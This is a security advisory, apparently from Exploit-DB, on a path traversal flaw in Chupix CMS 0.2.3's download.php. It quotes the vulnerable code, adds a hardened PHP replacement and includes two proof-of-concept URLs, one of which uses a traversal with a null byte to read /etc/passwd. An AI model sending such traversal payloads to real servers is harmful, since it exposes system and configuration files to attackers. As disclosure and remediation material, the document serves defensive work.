Vendor: Chupix CMS
By: GoLd_M
CVSS: 7.5 (HIGH)
Vulnerability type: Remote File Download (arbitrary file read)
CWE: 22 (Path Traversal)
Product Name: Chupix CMS
Affected Version From: 0.2.3
Affected Version To: 0.2.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability

Chupix CMS 0.2.3 is vulnerable to an arbitrary file read (path traversal, CWE-22) in 'download.php'. The script builds the path of the file to serve by concatenating the 'repertoire' and 'fichier' GET parameters onto "archives/" and passes the result straight to readfile() without checking for directory separators, ".." components or null bytes. An attacker who supplies a traversal sequence in either parameter can read any file the web server process is allowed to open, including the application's own source and configuration files. The same unvalidated values are also used to build the name of the download-counter file (archives/<repertoire>/cpt/<fichier>.php), which the script opens with fopen(..., "w+"), so a traversal request additionally creates or truncates a file at an attacker-chosen path wherever the web server has write access. The %00 form of the proof of concept relies on null-byte truncation of file paths, which PHP rejects from version 5.3.4 onward; the ".."-only form does not depend on the PHP version.

Mitigation:

No fixed release is listed for this issue (Patch Exists: NO above). Until the vendor ships one, harden download.php so that 'repertoire' and 'fichier' can each only name a single path component: reject empty values and anything containing '/', '\', '..' or a null byte, then resolve the final path with realpath() and confirm it still starts with the absolute path of the archives directory before calling readfile(). Pass the file name through basename() before placing it in the Content-Disposition header, and do not keep the download counter in a .php file whose name is taken from user input.
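As an added example (not Chupix CMS code and not part of the original advisory), the following hardened download handler shows how the path built from 'repertoire' and 'fichier' can be confined to the archives directory and how the counter write can be made safe. It assumes the archives live in ./archives next to the script and that the per-file counter is stored as plain text under <dir>/cpt/; the function names and the ARCHIVE_ROOT constant are the editor's own, not the project's.

```php
<?php
// Added example, not Chupix CMS code: a confined replacement for the
// string concatenation in download.php. Assumptions (not from the
// advisory): archives live under ./archives relative to this script and
// the per-file counter is kept as plain text in <dir>/cpt/<file>.txt.

define('ARCHIVE_ROOT', __DIR__ . '/archives');

/**
 * Resolve a user-supplied directory/file pair to a real path inside
 * ARCHIVE_ROOT, or return null if the request escapes it.
 */
function resolve_archive_path(string $repertoire, string $fichier): ?string
{
    // 1. Each value must be a single path component. This rejects "/",
    //    "\", "..", and the NUL byte the original %00 PoC relies on.
    foreach ([$repertoire, $fichier] as $part) {
        if ($part === '' || $part === '.' || $part === '..'
            || !preg_match('/\A[A-Za-z0-9._-]+\z/', $part)) {
            return null;
        }
    }

    // 2. Canonicalise (follows symlinks) and confirm the result is still
    //    below the archive root before it is handed to readfile().
    $root = realpath(ARCHIVE_ROOT);
    $path = realpath(ARCHIVE_ROOT . '/' . $repertoire . '/' . $fichier);
    if ($root === false || $path === false || !is_file($path)) {
        return null;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // a symlink or traversal led outside the archive tree
    }
    return $path;
}

/**
 * Increment the per-file download counter under $dir/cpt/ and return
 * the new value. Uses a plain-text file, never a .php file.
 */
function increment_counter(string $dir, string $fichier): int
{
    $cptDir = $dir . '/cpt';
    if (!is_dir($cptDir) && !mkdir($cptDir, 0755, true)) {
        return 0;
    }
    $counter = $cptDir . '/' . $fichier . '.txt';
    $fp = fopen($counter, 'c+'); // create if missing, do not truncate
    if ($fp === false) {
        return 0;
    }
    $n = 0;
    if (flock($fp, LOCK_EX)) {
        $n = (int) stream_get_contents($fp) + 1;
        ftruncate($fp, 0);
        rewind($fp);
        fwrite($fp, (string) $n);
        flock($fp, LOCK_UN);
    }
    fclose($fp);
    return $n;
}

if (isset($_GET['fichier'], $_GET['repertoire'])) {
    $path = resolve_archive_path((string) $_GET['repertoire'], (string) $_GET['fichier']);
    if ($path === null) {
        // Same answer for "does not exist" and "not allowed": no path oracle.
        http_response_code(404);
        exit('File not found');
    }
    increment_counter(dirname($path), basename($path));

    header('Content-Type: application/octet-stream');
    // basename() plus quoting keeps user input from shaping the header value.
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit;
}
```

With this handler both proof-of-concept URLs from the advisory fail at the first check (the ".." components and the %00 byte never match the allowed character class), and even a value that passes the regex is re-checked after realpath() so a symlink inside archives/ cannot point the download outside the tree.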

Exploit-DB raw data:

# Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability
# Product script: http://sourceforge.net/project/showfiles.php?group_id=134930
################################download.php################################
# Lines 18-57 of download.php. Lines marked "<-- XXXX" are where the
# unvalidated GET parameters are used.

if(isset($_GET['fichier'])){                                                  // <-- XXXX
		// download the file
		$file = "archives/". $_GET['repertoire'] ."/". $_GET['fichier'];      // <-- XXXX
		$fichier_txt = "archives/". $_GET['repertoire'] ."/cpt/". $_GET['fichier'] .".php";
		$repertoire = "archives/". $_GET['repertoire'] ."/cpt/";
		if(is_file($fichier_txt)){
			$fp           =   @fopen($fichier_txt, "r");                      // <-- XXXX
			$result       =   fread($fp, filesize ($fichier_txt));
			fclose($fp);
			$result       =   str_replace("<?php ", "", $result);
			$result       =   str_replace("?>", "", $result);

			$num = trim($result);
		}else{
			$num = 0;
		}
		$num++;

		$msg = "<?php ". $num ." ?>";

		if(!(is_dir($repertoire))){
			mkdir ($repertoire, 0755);
		}

		$fp  =   @fopen($fichier_txt, "w+");                                  // <-- XXXX
	  	if (flock($fp, LOCK_EX)) { // take an exclusive lock
    		fwrite($fp, $msg);
   			flock($fp, LOCK_UN); // release the lock
		}else{
    		echo "Impossible de verrouiller le fichier <font color=\"maroon\">". $fichier ."</font>";
		}
   	 	fclose($fp);

		header("Content-type: application/force-download");
		header("Content-Disposition: attachment; filename=".$_GET['fichier']);
		readfile($file);                                                      // <-- XXXX
}
################################download.php################################
# POC:
#   1) "archives/defaut/../../download.php" resolves to download.php in the web root,
#      so the script serves its own source:
      /download.php?repertoire=defaut&fichier=../../download.php
#   2) the trailing %00 truncates the path at the null byte, so readfile() opens
#      /etc/passwd instead of "...passwd" (requires PHP < 5.3.4):
      /download.php?fichier=../../../../../../../etc/passwd%00
# Discovered by: GoLd_M
# SP.TanX = Tryag.Com & Asb-May.Net & Milw0rm.Com

# milw0rm.com [2007-09-15]